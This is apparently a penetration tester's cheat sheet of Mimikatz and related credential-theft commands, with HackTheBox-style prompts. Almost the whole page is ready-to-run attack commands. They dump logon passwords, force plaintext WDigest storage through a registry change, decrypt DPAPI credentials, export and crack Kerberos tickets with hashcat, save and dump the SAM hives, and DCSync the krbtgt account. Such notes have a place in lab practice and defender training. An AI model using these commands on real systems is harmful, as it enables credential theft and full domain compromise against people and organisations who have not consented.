mimikatz

privilege::debug

for the saved logon password

sekurlsa::logonpasswords

  • If the password is null

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

- to check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

- restart the system
shutdown /r /t 0 /f

DPAPI

  • to get the master key

.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit

  • Getting creds after getting the master key

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

Extracting Tickets from Memory with Mimikatz

Using 'mimikatz.log' for logfile : OK

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export

  • Preparing the Base64 Blob for Cracking

AnuragTaparia@htb[/htb]$ echo "<base64 blob>" |  tr -d \\n > encoded_file

  • Placing the Output into a File as .kirbi

AnuragTaparia@htb[/htb]$ cat encoded_file | base64 -d > sqldev.kirbi

Next, we can use this version of the kirbi2john.py tool to extract the Kerberos ticket from the TGS file.

  • Extracting the Kerberos Ticket using kirbi2john.py

AnuragTaparia@htb[/htb]$ python2.7 kirbi2john.py sqldev.kirbi

This will create a file called crack_file. We then must modify the file a bit to be able to use Hashcat against the hash.

  • Modifying crack_file for Hashcat

AnuragTaparia@htb[/htb]$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

  • Cracking the Hash with Hashcat

AnuragTaparia@htb[/htb]$ hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

If we decide to skip the base64 output with Mimikatz and type mimikatz # kerberos::list /export, the .kirbi file (or files) will be written to disk. In this case, we can download the file(s) and run kirbi2john.py against them directly, skipping the base64 decoding step.

Infinite issue

  • use a non-interactive way

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

SAM Dump

lsadump::sam

  • Dump Hives with reg save

#dump SAM, SECURITY, SYSTEM
PS C:\temp> reg save HKLM\SAM C:\temp\SAM
PS C:\temp> reg save HKLM\SYSTEM C:\temp\SYSTEM
PS C:\temp> reg save HKLM\SECURITY C:\temp\SECURITY

└─$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

DCSync

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:painters\krbtgt /all /csv" exit
PreviousLDAPNextBloodhound

Last updated